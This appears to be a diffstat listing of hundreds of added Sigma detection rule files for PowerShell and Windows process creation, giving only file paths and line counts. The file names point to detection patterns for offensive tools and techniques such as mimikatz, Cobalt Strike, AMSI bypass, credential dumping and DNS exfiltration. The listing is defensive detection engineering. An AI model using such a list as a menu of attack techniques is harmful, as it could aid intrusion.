.../posh_pm_invoke_obfuscation_var.yml | 34 + ...osh_pm_invoke_obfuscation_via_compress.yml | 40 + .../posh_pm_invoke_obfuscation_via_rundll.yml | 38 + .../posh_pm_invoke_obfuscation_via_stdin.yml | 34 + ...osh_pm_invoke_obfuscation_via_use_clip.yml | 34 + ...sh_pm_invoke_obfuscation_via_use_mhsta.yml | 40 + ...pm_invoke_obfuscation_via_use_rundll32.yml | 43 + .../posh_pm_invoke_obfuscation_via_var.yml | 34 + .../posh_pm_malicious_commandlets.yml | 250 + .../posh_pm_remote_powershell_session.yml | 35 + .../posh_pm_remotefxvgpudisablement_abuse.yml | 37 + .../posh_pm_susp_ad_group_reco.yml | 44 + .../posh_pm_susp_download.yml | 34 + .../posh_pm_susp_get_nettcpconnection.yml | 29 + .../posh_pm_susp_invocation_generic.yml | 45 + .../posh_pm_susp_invocation_specific.yml | 80 + .../posh_pm_susp_local_group_reco.yml | 44 + ..._pm_susp_reset_computermachinepassword.yml | 31 + .../posh_pm_susp_smb_share_reco.yml | 33 + .../posh_pm_susp_zip_compress.yml | 42 + .../posh_pm_syncappvpublishingserver_exe.yml | 34 + ...posh_ps_aadinternals_cmdlets_execution.yml | 57 + .../posh_ps_access_to_browser_login_data.yml | 45 + ..._ps_active_directory_module_dll_import.yml | 40 + .../posh_ps_add_dnsclient_rule.yml | 35 + .../posh_ps_add_windows_capability.yml | 34 + .../posh_ps_adrecon_execution.yml | 35 + .../posh_ps_amsi_bypass_pattern_nov22.yml | 33 + .../posh_ps_amsi_null_bits_bypass.yml | 34 + .../posh_ps_apt_silence_eda.yml | 52 + .../posh_ps_as_rep_roasting.yml | 35 + .../posh_ps_audio_exfiltration.yml | 42 + .../posh_ps_automated_collection.yml | 43 + .../posh_ps_capture_screenshots.yml | 31 + .../posh_ps_clear_powershell_history.yml | 47 + ...sh_ps_clearing_windows_console_history.yml | 40 + .../posh_ps_cmdlet_scheduled_task.yml | 42 + ...h_ps_computer_discovery_get_adcomputer.yml | 40 + .../posh_ps_copy_item_system_directory.yml | 35 + .../posh_ps_cor_profiler.yml | 36 + .../posh_ps_create_local_user.yml | 31 + .../posh_ps_create_volume_shadow_copy.yml | 32 + .../posh_ps_detect_vm_env.yml | 38 + .../posh_ps_directorysearcher.yml | 33 + ...ps_directoryservices_accountmanagement.yml | 31 + ..._ps_disable_psreadline_command_history.yml | 30 + ...sh_ps_disable_windows_optional_feature.yml | 42 + .../posh_ps_dnscat_execution.yml | 29 + .../posh_ps_dotnet_assembly_from_file.yml | 28 + .../posh_ps_download_com_cradles.yml | 44 + ...mp_password_windows_credential_manager.yml | 44 + .../posh_ps_enable_psremoting.yml | 29 + ...s_enable_susp_windows_optional_feature.yml | 47 + ...te_password_windows_credential_manager.yml | 37 + .../posh_ps_etw_trace_evasion.yml | 38 + ..._exchange_mailbox_smpt_forwarding_rule.yml | 30 + .../posh_ps_export_certificate.yml | 38 + .../posh_ps_frombase64string_archive.yml | 34 + .../posh_ps_get_acl_service.yml | 35 + .../posh_ps_get_adcomputer.yml | 37 + .../powershell_script/posh_ps_get_adgroup.yml | 31 + .../posh_ps_get_adreplaccount.yml | 34 + .../posh_ps_get_childitem_bookmarks.yml | 38 + ...et_process_security_software_discovery.yml | 56 + .../powershell_script/posh_ps_hktl_rubeus.yml | 51 + .../powershell_script/posh_ps_hktl_winpwn.yml | 51 + .../powershell_script/posh_ps_hotfix_enum.yml | 29 + .../posh_ps_icmp_exfiltration.yml | 32 + .../posh_ps_import_module_susp_dirs.yml | 47 + ...posh_ps_install_unsigned_appx_packages.yml | 36 + .../posh_ps_invoke_command_remote.yml | 31 + .../posh_ps_invoke_dnsexfiltration.yml | 35 + .../posh_ps_invoke_obfuscation_clip.yml | 31 + ...h_ps_invoke_obfuscation_obfuscated_iex.yml | 36 + .../posh_ps_invoke_obfuscation_stdin.yml | 31 + .../posh_ps_invoke_obfuscation_var.yml | 31 + ...osh_ps_invoke_obfuscation_via_compress.yml | 37 + .../posh_ps_invoke_obfuscation_via_rundll.yml | 35 + .../posh_ps_invoke_obfuscation_via_stdin.yml | 31 + ...osh_ps_invoke_obfuscation_via_use_clip.yml | 31 + ...sh_ps_invoke_obfuscation_via_use_mhsta.yml | 37 + ...ps_invoke_obfuscation_via_use_rundll32.yml | 40 + .../posh_ps_invoke_obfuscation_via_var.yml | 31 + .../powershell_script/posh_ps_keylogging.yml | 34 + .../powershell_script/posh_ps_localuser.yml | 38 + .../posh_ps_mailboxexport_share.yml | 39 + .../posh_ps_malicious_commandlets.yml | 261 + .../posh_ps_malicious_keywords.yml | 49 + ...ps_memorydump_getstoragediagnosticinfo.yml | 30 + .../posh_ps_modify_group_policy_settings.yml | 40 + .../powershell_script/posh_ps_msxml_com.yml | 38 + .../posh_ps_nishang_malicious_commandlets.yml | 112 + .../posh_ps_ntfs_ads_access.yml | 36 + .../posh_ps_office_comobject_registerxll.yml | 34 + .../posh_ps_potential_invoke_mimikatz.yml | 35 + ...osh_ps_powerview_malicious_commandlets.yml | 139 + .../posh_ps_prompt_credentials.yml | 31 + .../posh_ps_psasyncshell.yml | 28 + .../powershell_script/posh_ps_psattack.yml | 29 + .../posh_ps_remote_session_creation.yml | 34 + .../posh_ps_remotefxvgpudisablement_abuse.yml | 36 + .../posh_ps_request_kerberos_ticket.yml | 31 + .../posh_ps_resolve_list_of_ip_from_file.yml | 33 + .../posh_ps_root_certificate_installed.yml | 35 + .../posh_ps_run_from_mount_diskimage.yml | 35 + ...osh_ps_script_with_upload_capabilities.yml | 37 + .../posh_ps_send_mailmessage.yml | 34 + .../posh_ps_sensitive_file_discovery.yml | 41 + .../powershell_script/posh_ps_set_acl.yml | 38 + .../posh_ps_set_acl_susp_location.yml | 55 + ...posh_ps_set_policies_to_unsecure_level.yml | 46 + .../posh_ps_shellcode_b64.yml | 36 + ...sh_ps_shellintel_malicious_commandlets.yml | 33 + .../posh_ps_software_discovery.yml | 35 + ...ps_store_file_in_alternate_data_stream.yml | 33 + .../posh_ps_susp_ace_tampering.yml | 39 + .../posh_ps_susp_ad_group_reco.yml | 38 + .../posh_ps_susp_alias_obfscuation.yml | 38 + .../posh_ps_susp_clear_eventlog.yml | 37 + .../posh_ps_susp_directory_enum.yml | 36 + .../posh_ps_susp_download.yml | 34 + .../posh_ps_susp_execute_batch_script.yml | 37 + .../posh_ps_susp_extracting.yml | 36 + .../posh_ps_susp_follina_execution.yml | 33 + ...susp_get_addefaultdomainpasswordpolicy.yml | 29 + .../posh_ps_susp_get_current_user.yml | 32 + .../posh_ps_susp_get_gpo.yml | 29 + .../posh_ps_susp_get_process.yml | 29 + .../posh_ps_susp_getprocess_lsass.yml | 29 + .../posh_ps_susp_gettypefromclsid.yml | 31 + .../posh_ps_susp_hyper_v_condlet.yml | 32 + .../posh_ps_susp_invocation_generic.yml | 45 + .../posh_ps_susp_invocation_specific.yml | 81 + ...sh_ps_susp_invoke_webrequest_useragent.yml | 33 + .../posh_ps_susp_iofilestream.yml | 32 + .../posh_ps_susp_keylogger_activity.yml | 32 + .../posh_ps_susp_keywords.yml | 45 + .../posh_ps_susp_local_group_reco.yml | 38 + .../posh_ps_susp_mail_acces.yml | 35 + .../posh_ps_susp_mount_diskimage.yml | 31 + .../posh_ps_susp_mounted_share_deletion.yml | 31 + .../posh_ps_susp_networkcredential.yml | 33 + .../posh_ps_susp_new_psdrive.yml | 35 + .../posh_ps_susp_proxy_scripts.yml | 31 + .../posh_ps_susp_recon_export.yml | 34 + .../posh_ps_susp_remove_adgroupmember.yml | 33 + ..._service_dacl_modification_set_service.yml | 47 + .../posh_ps_susp_set_alias.yml | 35 + .../posh_ps_susp_smb_share_reco.yml | 32 + .../posh_ps_susp_ssl_keyword.yml | 32 + .../posh_ps_susp_start_process.yml | 32 + .../posh_ps_susp_unblock_file.yml | 31 + .../posh_ps_susp_wallpaper.yml | 36 + .../posh_ps_susp_win32_pnpentity.yml | 29 + .../posh_ps_susp_win32_shadowcopy.yml | 32 + ...posh_ps_susp_win32_shadowcopy_deletion.yml | 47 + .../posh_ps_susp_windowstyle.yml | 38 + .../posh_ps_susp_write_eventlog.yml | 29 + .../posh_ps_susp_zip_compress.yml | 42 + .../posh_ps_syncappvpublishingserver_exe.yml | 34 + ...posh_ps_tamper_windows_defender_rem_mp.yml | 37 + ...posh_ps_tamper_windows_defender_set_mp.yml | 92 + .../posh_ps_test_netconnection.yml | 38 + .../powershell_script/posh_ps_timestomp.yml | 38 + .../posh_ps_token_obfuscation.yml | 48 + .../posh_ps_user_discovery_get_aduser.yml | 40 + .../posh_ps_user_profile_tampering.yml | 41 + ..._ps_using_set_service_to_hide_services.yml | 40 + ...osh_ps_veeam_credential_dumping_script.yml | 32 + .../posh_ps_web_request_cmd_and_cmdlets.yml | 45 + .../posh_ps_win32_nteventlogfile_usage.yml | 38 + .../posh_ps_win32_product_install_msi.yml | 33 + .../posh_ps_win_api_susp_access.yml | 54 + .../posh_ps_win_defender_exclusions_added.yml | 42 + ...h_ps_windows_firewall_profile_disabled.yml | 45 + .../posh_ps_winlogon_helper_dll.yml | 37 + .../posh_ps_wmi_persistence.yml | 39 + .../posh_ps_wmi_unquoted_service_search.yml | 42 + .../powershell_script/posh_ps_wmimplant.yml | 51 + .../posh_ps_x509enrollment.yml | 35 + .../powershell_script/posh_ps_xml_iex.yml | 41 + ...proc_creation_win_7zip_exfil_dmp_files.yml | 42 + ...creation_win_7zip_password_compression.yml | 39 + ..._creation_win_7zip_password_extraction.yml | 37 + ...ation_win_addinutil_suspicious_cmdline.yml | 50 + ...n_win_addinutil_uncommon_child_process.yml | 31 + ...reation_win_addinutil_uncommon_cmdline.yml | 37 + ...eation_win_addinutil_uncommon_dir_exec.yml | 31 + .../proc_creation_win_adplus_memory_dump.yml | 42 + ...tion_win_agentexecutor_potential_abuse.yml | 44 + ..._creation_win_agentexecutor_susp_usage.yml | 48 + ...tion_win_appvlp_uncommon_child_process.yml | 46 + ...creation_win_aspnet_compiler_exectuion.yml | 37 + ...win_aspnet_compiler_susp_child_process.yml | 46 + ...reation_win_aspnet_compiler_susp_paths.yml | 45 + ..._creation_win_at_interactive_execution.yml | 28 + .../proc_creation_win_attrib_hiding_files.yml | 37 + .../proc_creation_win_attrib_system.yml | 34 + ..._creation_win_attrib_system_susp_paths.yml | 56 + ...ion_win_auditpol_nt_resource_kit_usage.yml | 38 + ...c_creation_win_auditpol_susp_execution.yml | 38 + ...oc_creation_win_bash_command_execution.yml | 31 + .../proc_creation_win_bash_file_execution.yml | 46 + ..._creation_win_bcdedit_boot_conf_tamper.yml | 41 + ...oc_creation_win_bcdedit_susp_execution.yml | 35 + ...on_win_bginfo_suspicious_child_process.yml | 51 + ...tion_win_bginfo_uncommon_child_process.yml | 35 + .../proc_creation_win_bitsadmin_download.yml | 43 + ...ation_win_bitsadmin_download_direct_ip.yml | 57 + ...itsadmin_download_file_sharing_domains.yml | 68 + ...win_bitsadmin_download_susp_extensions.yml | 71 + ...n_bitsadmin_download_susp_targetfolder.yml | 50 + ...tsadmin_download_uncommon_targetfolder.yml | 48 + ...on_win_bitsadmin_potential_persistence.yml | 43 + ...n_browsers_chromium_headless_debugging.yml | 34 + ...on_win_browsers_chromium_headless_exec.yml | 35 + ...owsers_chromium_headless_file_download.yml | 39 + ...n_win_browsers_chromium_load_extension.yml | 37 + ...on_win_browsers_chromium_mockbin_abuse.yml | 35 + ..._browsers_chromium_susp_load_extension.yml | 46 + ...tion_win_browsers_inline_file_download.yml | 47 + ...creation_win_browsers_remote_debugging.yml | 36 + ...oc_creation_win_browsers_tor_execution.yml | 28 + .../proc_creation_win_calc_uncommon_exec.yml | 34 + ...n_win_certmgr_certificate_installation.yml | 39 + .../proc_creation_win_certoc_download.yml | 34 + ...creation_win_certoc_download_direct_ip.yml | 34 + .../proc_creation_win_certoc_load_dll.yml | 39 + ...ion_win_certoc_load_dll_susp_locations.yml | 43 + ..._win_certutil_certificate_installation.yml | 40 + .../proc_creation_win_certutil_decode.yml | 39 + .../proc_creation_win_certutil_download.yml | 39 + ...eation_win_certutil_download_direct_ip.yml | 76 + ...certutil_download_file_sharing_domains.yml | 66 + .../proc_creation_win_certutil_encode.yml | 33 + ...on_win_certutil_encode_susp_extensions.yml | 51 + ...tion_win_certutil_encode_susp_location.yml | 46 + .../proc_creation_win_certutil_export_pfx.yml | 31 + ...oc_creation_win_certutil_ntlm_coercion.yml | 31 + ...proc_creation_win_chcp_codepage_switch.yml | 36 + ...tion_win_cipher_overwrite_deleted_data.yml | 32 + ...ion_win_citrix_trolleyexpress_procdump.yml | 47 + .../proc_creation_win_clip_execution.yml | 28 + ...ion_win_cloudflared_portable_execution.yml | 34 + ..._win_cloudflared_quicktunnel_execution.yml | 92 + ...reation_win_cloudflared_tunnel_cleanup.yml | 34 + ...oc_creation_win_cloudflared_tunnel_run.yml | 37 + .../proc_creation_win_cmd_assoc_execution.yml | 42 + ..._cmd_assoc_tamper_exe_file_association.yml | 38 + ...c_creation_win_cmd_copy_dmp_from_share.yml | 35 + ...ation_win_cmd_curl_download_exec_combo.yml | 36 + .../proc_creation_win_cmd_del_execution.yml | 41 + ...c_creation_win_cmd_del_greedy_deletion.yml | 40 + .../proc_creation_win_cmd_dir_execution.yml | 29 + .../proc_creation_win_cmd_dosfuscation.yml | 45 + .../proc_creation_win_cmd_http_appdata.yml | 37 + .../proc_creation_win_cmd_mklink_osk_cmd.yml | 34 + ...md_mklink_shadow_copies_access_symlink.yml | 29 + ...reation_win_cmd_net_use_and_exec_combo.yml | 40 + ...oc_creation_win_cmd_no_space_execution.yml | 70 + ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 29 + .../proc_creation_win_cmd_path_traversal.yml | 43 + ...n_win_cmd_ping_copy_combined_execution.yml | 35 + ...on_win_cmd_ping_del_combined_execution.yml | 45 + .../proc_creation_win_cmd_redirect.yml | 37 + ...eation_win_cmd_redirection_susp_folder.yml | 60 + .../proc_creation_win_cmd_rmdir_execution.yml | 38 + ...roc_creation_win_cmd_shadowcopy_access.yml | 32 + .../proc_creation_win_cmd_stdin_redirect.yml | 32 + ...cmd_sticky_key_like_backdoor_execution.yml | 49 + ...c_creation_win_cmd_sticky_keys_replace.yml | 33 + .../proc_creation_win_cmd_unusual_parent.yml | 51 + ...eation_win_cmdkey_adding_generic_creds.yml | 31 + .../proc_creation_win_cmdkey_recon.yml | 37 + ...eation_win_cmstp_execution_by_creation.yml | 34 + ...roc_creation_win_conhost_legacy_option.yml | 31 + ...reation_win_conhost_susp_child_process.yml | 34 + ...c_creation_win_conhost_uncommon_parent.yml | 58 + .../proc_creation_win_control_panel_item.yml | 46 + ...eation_win_createdump_lolbin_execution.yml | 39 + ...ation_win_csc_susp_dynamic_compilation.yml | 75 + .../proc_creation_win_csc_susp_parent.yml | 90 + .../proc_creation_win_csi_execution.yml | 43 + .../proc_creation_win_csvde_export.yml | 31 + ...roc_creation_win_curl_cookie_hijacking.yml | 28 + ...oc_creation_win_curl_custom_user_agent.yml | 29 + ...ation_win_curl_download_direct_ip_exec.yml | 84 + ...url_download_direct_ip_susp_extensions.yml | 81 + ...url_download_susp_file_sharing_domains.yml | 92 + ..._creation_win_curl_insecure_connection.yml | 28 + ...reation_win_curl_insecure_porxy_or_doh.yml | 29 + ...proc_creation_win_curl_local_file_read.yml | 27 + .../proc_creation_win_curl_susp_download.yml | 70 + ...desktopimgdownldr_remote_file_download.yml | 27 + ...n_win_desktopimgdownldr_susp_execution.yml | 39 + ...ion_win_deviceenroller_dll_sideloading.yml | 35 + ...proc_creation_win_devinit_lolbin_usage.yml | 30 + ...n_win_dfsvc_suspicious_child_processes.yml | 44 + .../proc_creation_win_dirlister_execution.yml | 28 + ...tion_win_diskshadow_child_process_susp.yml | 50 + ...on_win_diskshadow_script_mode_susp_ext.yml | 51 + ...n_diskshadow_script_mode_susp_location.yml | 54 + ..._creation_win_dll_sideload_vmware_xfer.yml | 27 + ..._creation_win_dllhost_no_cli_execution.yml | 33 + ...n_win_dns_exfiltration_tools_execution.yml | 28 + ...oc_creation_win_dns_susp_child_process.yml | 28 + .../proc_creation_win_dnscmd_discovery.yml | 35 + ...md_install_new_server_level_plugin_dll.yml | 36 + ...tion_win_dotnet_trace_lolbin_execution.yml | 31 + .../proc_creation_win_driverquery_recon.yml | 42 + .../proc_creation_win_driverquery_usage.yml | 42 + ..._creation_win_dsacls_abuse_permissions.yml | 38 + ...roc_creation_win_dsacls_password_spray.yml | 33 + .../proc_creation_win_dsim_remove.yml | 43 + ...ion_win_dsquery_domain_trust_discovery.yml | 35 + .../proc_creation_win_dtrace_kernel_dump.yml | 31 + ...oc_creation_win_dumpminitool_execution.yml | 42 + ...eation_win_dumpminitool_susp_execution.yml | 49 + .../proc_creation_win_esentutl_params.yml | 36 + ...ation_win_esentutl_sensitive_file_copy.yml | 49 + .../proc_creation_win_esentutl_webcache.yml | 35 + ...eation_win_eventvwr_susp_child_process.yml | 37 + ...ltration_and_tunneling_tools_execution.yml | 31 + ...proc_creation_win_expand_cabinet_files.yml | 53 + ...eation_win_explorer_break_process_tree.yml | 37 + ...creation_win_explorer_lolbin_execution.yml | 28 + .../proc_creation_win_explorer_nouaccheck.yml | 31 + .../proc_creation_win_findstr_download.yml | 47 + ...roc_creation_win_findstr_gpp_passwords.yml | 36 + .../proc_creation_win_findstr_lnk.yml | 38 + .../proc_creation_win_findstr_lsass.yml | 41 + ...oc_creation_win_findstr_recon_everyone.yml | 46 + ...creation_win_findstr_recon_pipe_output.yml | 73 + ...on_win_findstr_security_keyword_lookup.yml | 67 + ..._creation_win_findstr_subfolder_search.yml | 45 + ..._sysmon_discovery_via_default_altitude.yml | 33 + .../proc_creation_win_finger_usage.yml | 29 + .../proc_creation_win_fltmc_unload_driver.yml | 38 + ...reation_win_fltmc_unload_driver_sysmon.yml | 36 + ...in_forfiles_child_process_masquerading.yml | 43 + ...creation_win_forfiles_proxy_execution_.yml | 40 + ..._creation_win_fsutil_drive_enumeration.yml | 30 + ..._creation_win_fsutil_symlinkevaluation.yml | 35 + .../proc_creation_win_fsutil_usage.yml | 41 + ...ownloadwrapper_arbitrary_file_download.yml | 31 + .../proc_creation_win_git_susp_clone.yml | 50 + ...on_win_googleupdate_susp_child_process.yml | 37 + .../proc_creation_win_gpg4win_decryption.yml | 33 + .../proc_creation_win_gpg4win_encryption.yml | 33 + ...reation_win_gpg4win_portable_execution.yml | 36 + ...roc_creation_win_gpg4win_susp_location.yml | 40 + .../proc_creation_win_gpresult_execution.yml | 31 + ...ion_win_gup_arbitrary_binary_execution.yml | 33 + .../proc_creation_win_gup_download.yml | 33 + ..._creation_win_gup_suspicious_execution.yml | 35 + .../proc_creation_win_hh_chm_execution.yml | 31 + ...in_hh_chm_remote_download_or_execution.yml | 31 + ...on_win_hh_html_help_susp_child_process.yml | 57 + .../proc_creation_win_hh_susp_execution.yml | 55 + .../proc_creation_win_hktl_adcspwn.yml | 28 + ...reation_win_hktl_bloodhound_sharphound.yml | 57 + ..._creation_win_hktl_c3_rundll32_pattern.yml | 29 + .../proc_creation_win_hktl_certify.yml | 44 + .../proc_creation_win_hktl_certipy.yml | 50 + ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 48 + ...win_hktl_cobaltstrike_bloopers_modules.yml | 41 + ...win_hktl_cobaltstrike_load_by_rundll32.yml | 37 + ...win_hktl_cobaltstrike_process_patterns.yml | 43 + .../proc_creation_win_hktl_coercedpotato.yml | 38 + .../proc_creation_win_hktl_covenant.yml | 39 + ...eation_win_hktl_crackmapexec_execution.yml | 85 + ...n_hktl_crackmapexec_execution_patterns.yml | 40 + ...reation_win_hktl_crackmapexec_patterns.yml | 48 + ...tl_crackmapexec_powershell_obfuscation.yml | 47 + .../proc_creation_win_hktl_createminidump.yml | 28 + .../proc_creation_win_hktl_dinjector.yml | 28 + .../proc_creation_win_hktl_edrsilencer.yml | 28 + ...tion_win_hktl_empire_powershell_launch.yml | 35 + ..._win_hktl_empire_powershell_uac_bypass.yml | 34 + .../proc_creation_win_hktl_evil_winrm.yml | 31 + ...ation_win_hktl_execution_via_imphashes.yml | 202 + .../proc_creation_win_hktl_gmer.yml | 34 + .../proc_creation_win_hktl_handlekatz.yml | 43 + .../proc_creation_win_hktl_hashcat.yml | 32 + ...c_creation_win_hktl_htran_or_natbypass.yml | 34 + .../proc_creation_win_hktl_hydra.yml | 32 + ...ion_win_hktl_impacket_lateral_movement.yml | 75 + .../proc_creation_win_hktl_impacket_tools.yml | 77 + .../proc_creation_win_hktl_impersonate.yml | 43 + .../proc_creation_win_hktl_inveigh.yml | 37 + ...ation_win_hktl_invoke_obfuscation_clip.yml | 38 + ...obfuscation_obfuscated_iex_commandline.yml | 34 + ...tion_win_hktl_invoke_obfuscation_stdin.yml | 41 + ...eation_win_hktl_invoke_obfuscation_var.yml | 37 + ...n_hktl_invoke_obfuscation_via_compress.yml | 34 + ..._win_hktl_invoke_obfuscation_via_stdin.yml | 35 + ...n_hktl_invoke_obfuscation_via_use_clip.yml | 43 + ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 34 + ...on_win_hktl_invoke_obfuscation_via_var.yml | 42 + ...eation_win_hktl_jlaive_batch_execution.yml | 44 + .../proc_creation_win_hktl_koadic.yml | 39 + .../proc_creation_win_hktl_krbrelay.yml | 42 + .../proc_creation_win_hktl_krbrelayup.yml | 44 + .../proc_creation_win_hktl_localpotato.yml | 39 + ...reation_win_hktl_meterpreter_getsystem.yml | 53 + ...reation_win_hktl_mimikatz_command_line.yml | 58 + .../proc_creation_win_hktl_pchunter.yml | 61 + ...tl_powersploit_empire_default_schtasks.yml | 46 + .../proc_creation_win_hktl_powertool.yml | 32 + ...eation_win_hktl_purplesharp_indicators.yml | 31 + .../proc_creation_win_hktl_pypykatz.yml | 32 + .../proc_creation_win_hktl_quarks_pwdump.yml | 37 + ...on_win_hktl_redmimicry_winnti_playbook.yml | 35 + ..._creation_win_hktl_relay_attacks_tools.yml | 61 + .../proc_creation_win_hktl_rubeus.yml | 52 + .../proc_creation_win_hktl_safetykatz.yml | 28 + .../proc_creation_win_hktl_secutyxploded.yml | 29 + .../proc_creation_win_hktl_selectmyparent.yml | 57 + .../proc_creation_win_hktl_sharp_chisel.yml | 32 + ..._creation_win_hktl_sharp_impersonation.yml | 43 + ...c_creation_win_hktl_sharp_ldap_monitor.yml | 31 + .../proc_creation_win_hktl_sharpersist.yml | 44 + .../proc_creation_win_hktl_sharpevtmute.yml | 33 + ...proc_creation_win_hktl_sharpldapwhoami.yml | 38 + .../proc_creation_win_hktl_sharpup.yml | 37 + .../proc_creation_win_hktl_sharpview.yml | 145 + ...n_win_hktl_sliver_c2_execution_pattern.yml | 27 + ...ation_win_hktl_stracciatella_execution.yml | 36 + .../proc_creation_win_hktl_sysmoneop.yml | 34 + .../proc_creation_win_hktl_trufflesnout.yml | 29 + .../proc_creation_win_hktl_uacme.yml | 69 + .../proc_creation_win_hktl_wce.yml | 37 + .../proc_creation_win_hktl_winpeas.yml | 51 + .../proc_creation_win_hktl_winpwn.yml | 48 + ...on_win_hktl_wmiexec_default_powershell.yml | 25 + .../proc_creation_win_hktl_xordump.yml | 32 + .../proc_creation_win_hktl_zipexec.yml | 38 + .../proc_creation_win_hostname_execution.yml | 26 + .../proc_creation_win_hwp_exploits.yml | 35 + .../proc_creation_win_icacls_deny.yml | 31 + .../proc_creation_win_ieexec_download.yml | 31 + ...c_creation_win_iis_appcmd_http_logging.yml | 33 + ...appcmd_service_account_password_dumped.yml | 51 + ...ion_win_iis_appcmd_susp_module_install.yml | 37 + ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 32 + ..._win_iis_connection_strings_decryption.yml | 31 + ...ation_win_iis_susp_module_registration.yml | 35 + ...ion_win_imagingdevices_unusual_parents.yml | 34 + .../proc_creation_win_imewbdld_download.yml | 36 + ..._infdefaultinstall_execute_sct_scripts.yml | 34 + ...proc_creation_win_installutil_download.yml | 33 + ...eation_win_instalutil_no_log_execution.yml | 30 + ...on_win_java_keytool_susp_child_process.yml | 53 + ...n_java_manageengine_susp_child_process.yml | 64 + ...roc_creation_win_java_remote_debugging.yml | 37 + ...c_creation_win_java_susp_child_process.yml | 54 + ...creation_win_java_susp_child_process_2.yml | 36 + .../proc_creation_win_kd_execution.yml | 26 + ...on_win_ksetup_password_change_computer.yml | 28 + ...eation_win_ksetup_password_change_user.yml | 27 + .../proc_creation_win_ldifde_export.yml | 31 + .../proc_creation_win_ldifde_file_load.yml | 36 + ...n_lodctr_performance_counter_tampering.yml | 29 + ...c_creation_win_logman_disable_eventlog.yml | 40 + .../proc_creation_win_lolbin_cdb.yml | 36 + ...creation_win_lolbin_class_exec_xwizard.yml | 27 + .../proc_creation_win_lolbin_cmdl32.yml | 34 + ...eation_win_lolbin_configsecuritypolicy.yml | 33 + ...oc_creation_win_lolbin_customshellhost.yml | 28 + ...data_exfiltration_by_using_datasvcutil.yml | 43 + ...eation_win_lolbin_dctask64_proc_inject.yml | 34 + .../proc_creation_win_lolbin_defaultpack.yml | 27 + ...in_lolbin_device_credential_deployment.yml | 25 + ...c_creation_win_lolbin_devtoolslauncher.yml | 28 + .../proc_creation_win_lolbin_diantz_ads.yml | 29 + ..._creation_win_lolbin_diantz_remote_cab.yml | 29 + ...eation_win_lolbin_dll_sideload_xwizard.yml | 29 + .../proc_creation_win_lolbin_dnx.yml | 28 + .../proc_creation_win_lolbin_dotnet.yml | 38 + .../proc_creation_win_lolbin_dotnet_dump.yml | 29 + .../proc_creation_win_lolbin_dump64.yml | 32 + .../proc_creation_win_lolbin_extexport.yml | 28 + .../proc_creation_win_lolbin_extrac32.yml | 35 + .../proc_creation_win_lolbin_extrac32_ads.yml | 29 + .../proc_creation_win_lolbin_format.yml | 33 + ...reation_win_lolbin_fsharp_interpreters.yml | 31 + .../proc_creation_win_lolbin_ftp.yml | 35 + ...reation_win_lolbin_gather_network_info.yml | 41 + .../proc_creation_win_lolbin_gpscript.yml | 34 + .../proc_creation_win_lolbin_ie4uinit.yml | 34 + .../proc_creation_win_lolbin_ilasm.yml | 28 + .../proc_creation_win_lolbin_jsc.yml | 26 + .../proc_creation_win_lolbin_kavremover.yml | 29 + ..._creation_win_lolbin_launch_vsdevshell.yml | 29 + .../proc_creation_win_lolbin_manage_bde.yml | 40 + ...win_lolbin_mavinject_process_injection.yml | 40 + .../proc_creation_win_lolbin_mpiexec.yml | 34 + .../proc_creation_win_lolbin_msdeploy.yml | 37 + ...c_creation_win_lolbin_msdt_answer_file.yml | 33 + .../proc_creation_win_lolbin_openconsole.yml | 28 + .../proc_creation_win_lolbin_openwith.yml | 28 + .../proc_creation_win_lolbin_pcalua.yml | 31 + .../proc_creation_win_lolbin_pcwrun.yml | 34 + ...roc_creation_win_lolbin_pcwrun_follina.yml | 27 + .../proc_creation_win_lolbin_pcwutl.yml | 32 + .../proc_creation_win_lolbin_pester.yml | 38 + .../proc_creation_win_lolbin_pester_1.yml | 43 + .../proc_creation_win_lolbin_printbrm.yml | 30 + .../proc_creation_win_lolbin_pubprn.yml | 27 + ...tion_win_lolbin_rasautou_dll_execution.yml | 33 + .../proc_creation_win_lolbin_register_app.yml | 27 + .../proc_creation_win_lolbin_remote.yml | 27 + .../proc_creation_win_lolbin_replace.yml | 31 + .../proc_creation_win_lolbin_runexehelper.yml | 26 + ...oc_creation_win_lolbin_runscripthelper.yml | 31 + .../proc_creation_win_lolbin_scriptrunner.yml | 29 + .../proc_creation_win_lolbin_setres.yml | 30 + .../proc_creation_win_lolbin_sftp.yml | 32 + ...eation_win_lolbin_sideload_link_binary.yml | 32 + .../proc_creation_win_lolbin_sigverif.yml | 26 + .../proc_creation_win_lolbin_ssh.yml | 38 + ...eation_win_lolbin_susp_acccheckconsole.yml | 31 + ...proc_creation_win_lolbin_susp_atbroker.yml | 57 + ...ation_win_lolbin_susp_certreq_download.yml | 36 + ...olbin_susp_driver_installed_by_pnputil.yml | 40 + .../proc_creation_win_lolbin_susp_dxcap.yml | 30 + .../proc_creation_win_lolbin_susp_grpconv.yml | 27 + ...ion_win_lolbin_susp_sqldumper_activity.yml | 31 + ...n_syncappvpublishingserver_execute_psh.yml | 38 + ...ncappvpublishingserver_vbs_execute_psh.yml | 35 + .../proc_creation_win_lolbin_tracker.yml | 41 + .../proc_creation_win_lolbin_ttdinject.yml | 26 + ..._creation_win_lolbin_tttracer_mod_load.yml | 33 + .../proc_creation_win_lolbin_type.yml | 32 + .../proc_creation_win_lolbin_unregmp2.yml | 28 + ...c_creation_win_lolbin_utilityfunctions.yml | 27 + ...ation_win_lolbin_visual_basic_compiler.yml | 27 + ...ation_win_lolbin_visualuiaverifynative.yml | 29 + ...c_creation_win_lolbin_vsiisexelauncher.yml | 30 + .../proc_creation_win_lolbin_wfc.yml | 27 + .../proc_creation_win_lolbin_wlrmdr.yml | 42 + ..._creation_win_lolbin_workflow_compiler.yml | 34 + ...oc_creation_win_lolscript_register_app.yml | 34 + .../proc_creation_win_lsass_process_clone.yml | 30 + ..._creation_win_malware_conti_shadowcopy.yml | 36 + ...oc_creation_win_malware_script_dropper.yml | 43 + ...roc_creation_win_mftrace_child_process.yml | 26 + ...reation_win_mmc_mmc20_lateral_movement.yml | 29 + ...oc_creation_win_mmc_susp_child_process.yml | 40 + .../proc_creation_win_mofcomp_execution.yml | 55 + ...ion_win_mpcmdrun_dll_sideload_defender.yml | 38 + ...n_win_mpcmdrun_download_arbitrary_file.yml | 36 + ...run_remove_windows_defender_definition.yml | 37 + ...eation_win_msbuild_susp_parent_process.yml | 34 + ...n_win_msdt_arbitrary_command_execution.yml | 37 + ...roc_creation_win_msdt_susp_cab_options.yml | 37 + 